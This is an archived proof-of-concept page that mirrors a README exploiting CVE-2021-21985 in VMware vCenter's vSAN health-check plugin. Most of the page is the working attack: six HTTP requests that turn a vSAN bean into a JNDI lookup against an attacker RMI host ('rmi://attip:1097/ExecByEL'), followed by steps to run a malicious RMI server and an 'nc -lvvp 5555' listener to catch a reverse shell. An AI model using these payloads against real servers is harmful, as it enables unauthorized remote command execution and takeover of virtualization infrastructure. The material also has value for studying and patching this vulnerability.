Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-21985 PoC — Vmware vSphere Client 输入验证错误漏洞

Source
https://github.com/xnianq/cve-2021-21985_exp
Associated Vulnerability
Title:Vmware vSphere Client 输入验证错误漏洞 (CVE-2021-21985)
Description:Vmware vSphere Client是美国威睿(Vmware)公司的一个应用软件。提供虚拟化管理。 Vmware vSphere Client 存在输入验证错误漏洞,该漏洞由于vCenter Server默认启用的虚拟SAN健康检查插件缺乏输入验证,导致攻击者可以在底层操作系统上以不受限制的权限执行命令。
Description
cve-2021-21985 exploit
Readme
# cve-2021-21985 exploit

## 0x01 漏洞点

![image-20210603144442312](README.assets/image-20210603144442312.png)

分析可见:

https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=home#rapid7-analysis

## 0x02 exploit

对beans对象进行重新构造,实现rce。

bean列表: 

```
localizedMessageBundle
vsanWorkerThreadFactory
vsanThreadPoolImpl
vsanServiceBundleActivator
vsanServiceFactory
vsanProviderUtils_setVmodlHelper
vsanProviderUtils_setVsanServiceFactory
vsanQueryUtil_setDataService
vsanComponentsProviderImpl
capabilityPropertyProviderImpl
pbmDataProviderImpl
vsanCapabilityCacheManager
vsanCapabilityUtils_setVsanCapabilityCacheManager
vsanUtils_setMessageBundle
vsanFormatUtils_setUserSessionService
```

随风大佬使用的vsanProviderUtils_setVmodlHelper在我这边环境没测试成功,就选用了另外的bean进行测试,由于Vsphere UI使用的tomcat中间件,可以通过jndi rmi bypass(https://github.com/welk1n/JNDI-Injection-Bypass/blob/master/src/main/java/payloads/EvilRMIServer.java)远程执行命令。

```
Step1
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setTargetObject
{"methodInput":[null]}


Step2
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setStaticMethod
{"methodInput":["javax.naming.InitialContext.doLookup"]}

Step3
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setTargetMethod
{"methodInput":["doLookup"]}

Step4 
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setArguments
{"methodInput":[["rmi://attip:1097/ExecByEL"]]}

Step5
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/prepare
{"methodInput":[]}

Step6
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/invoke
{"methodInput":[]}
```

## 0x03 使用方法

1. 启动rmi服务
  java -cp  JNDI-Injection-Bypass-1.0-SNAPSHOT-all.jar payloads.EvilRMIServer attip
  ![image-20210603201234855](README.assets/image-20210603201234855.png)
2. 启动reverse shell 侦听
```angular2
nc -lvvp 5555
```
3. 执行以上payload,得到reverse shell
![image-20210603201337539](README.assets/image-20210603201337539.png)

## 0x04 reference
* https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/
* https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis
* https://github.com/welk1n/JNDI-Injection-Bypass
File Snapshot

 [4.0K]  /data/pocs/da1810f019615ad3a51e4829fe3decaaed2143e2
├── [2.4K]  cve-2021-21985.py
├── [7.7M]  JNDI-Injection-Bypass-1.0-SNAPSHOT-all.jar
├── [4.0K]  README.assets
│   ├── [785K]  image-20210603144442312.png
│   ├── [ 21K]  image-20210603201234855.png
│   └── [315K]  image-20210603201337539.png
└── [2.4K]  README.md

1 directory, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.